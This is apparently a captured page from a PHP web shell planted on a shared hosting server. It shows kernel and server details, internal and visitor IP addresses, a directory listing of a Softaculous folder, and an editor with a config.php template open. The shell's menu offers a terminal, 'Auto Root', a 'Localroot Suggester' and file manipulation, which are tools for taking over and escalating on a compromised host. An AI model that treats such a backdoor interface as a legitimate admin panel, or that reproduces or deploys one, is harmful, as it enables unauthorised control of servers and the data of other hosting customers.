Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
page /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-09-29 11:29
php53
[ DIR ]
drwxr-xr-x
2017-09-29 11:29
php56
[ DIR ]
drwxr-xr-x
2017-09-29 11:29
php71
[ DIR ]
drwxr-xr-x
2017-09-29 11:29
clone.php
5.52
KB
-rw-r--r--
2017-09-28 08:01
config.language.php
39
B
-rw-r--r--
2011-06-27 09:52
config.php
1.28
KB
-rw-r--r--
2011-06-27 09:52
edit.php
4.91
KB
-rw-r--r--
2017-09-28 08:01
edit.xml
433
B
-rw-r--r--
2015-04-11 06:18
fileindex.php
243
B
-rw-r--r--
2012-08-14 06:43
import.php
3.21
KB
-rw-r--r--
2017-09-28 08:01
info.xml
1.91
KB
-rw-r--r--
2017-09-28 07:58
install.js
921
B
-rw-r--r--
2013-01-04 06:22
install.php
5.41
KB
-rw-r--r--
2017-09-28 08:01
install.xml
847
B
-rw-r--r--
2012-12-14 03:01
md5
2.61
KB
-rw-r--r--
2017-09-28 08:01
notes.txt
28
B
-rw-r--r--
2011-06-27 09:52
rss.xml
749
B
-rw-r--r--
2012-08-14 06:43
upgrade.php
2.51
KB
-rw-r--r--
2017-09-28 08:01
upgrade.xml
303
B
-rw-r--r--
2011-07-28 22:36
Save
Rename
<?php /* 提示: 发生 Warning: Cannot modify header information - headers already sent by (output started at config.php:1) in global.php on line 12 此类错误是由于文件保存时添加的 UTF-8 BOM 造成的, 建议不要使用记事本修改此文件, 如果站点名称不是中文的可以直接保存为 GB2312 编码避免此问题. */ ############ 数据库配置 ############ ############ DATABASE SETTINGS ############ // 数据库主机 // Database host define(DATABASE_HOST, '[[softdbhost]]'); // 数据库用户名 // Database username define(DATABASE_USER, '[[softdbuser]]'); // 数据库密码 // Database password define(DATABASE_PSSWORD, '[[softdbpass]]'); // 数据库名称 // Database name define(DATABASE_DB_NAME, '[[softdb]]'); ############ 站点配置 ############ ############ WEBSITE SETTINGS ############ // 网站名称 // Website name define(SITE_NAME, '[[site_name]]'); // 微博访问路径, 请以 / 结尾 // Website visit URL, End up with / define(BASE_URL, '[[softurl]]/'); ############ 下面的内容无需修改 ############ ############ DON'T MODIFY ############ define(COOKERY_FRAMEWORK_DIR, './'); define(DEBUG, FALSE); define(COOKIE_PREFIX, substr(strtoupper(md5($_SERVER['HTTP_HOST'])), 0, 6) . '_');